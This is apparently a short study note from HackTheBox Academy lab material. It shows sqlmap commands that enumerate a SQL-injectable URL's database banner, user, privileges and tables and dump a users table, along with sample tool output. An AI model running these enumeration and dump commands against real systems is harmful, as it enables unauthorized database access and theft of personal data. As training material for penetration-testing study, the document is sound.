Learning from HackTheBox Academy
Enumeration usually starts with the retrieval of the basic information:
Database version banner (switch --banner)
Current user name (switch --current-user)
Current database name (switch --current-db)
Checking if the current user has DBA (administrator) rights.
Using sqlmap to do this:
sqlmap -u "http://www.example.com/?id=1" --banner --current-user --current-db --is-dba[20:34:38] [INFO] the back-end DBMS is MySQL
[20:34:38] [INFO] fetching banner
web server operating system: Linux Debian 10 (buster)
web application technology: Apache 2.4.38
back-end DBMS: MySQL >= 5.0 (MariaDB fork)
banner: '10.3.23-MariaDB-0+deb10u1'
[20:34:38] [INFO] fetching current user
current user: 'user1@localhost'
[20:34:38] [INFO] fetching current database
current database: 'testdb'
[20:34:38] [INFO] testing if current user is DBA
[20:34:38] [INFO] fetching current user
[20:34:39] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
current user is DBA: False
[20:34:39] [INFO] fetched data logged to text files under '/home/htb-ac-560126/.local/share/sqlmap/output/144.126.206.249'Enumerating tables
sqlmap -u "http://www.example.com/?id=1" --tables -D testdbEnumerating Rows
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdbYou can then bring down only the columns of that table, instead of the full columns by adding -C followed by the names of the columns you want
sqlmap -u "http://www.example.com/?id=1" --dump -T users -D testdb -C name,surname
Comentários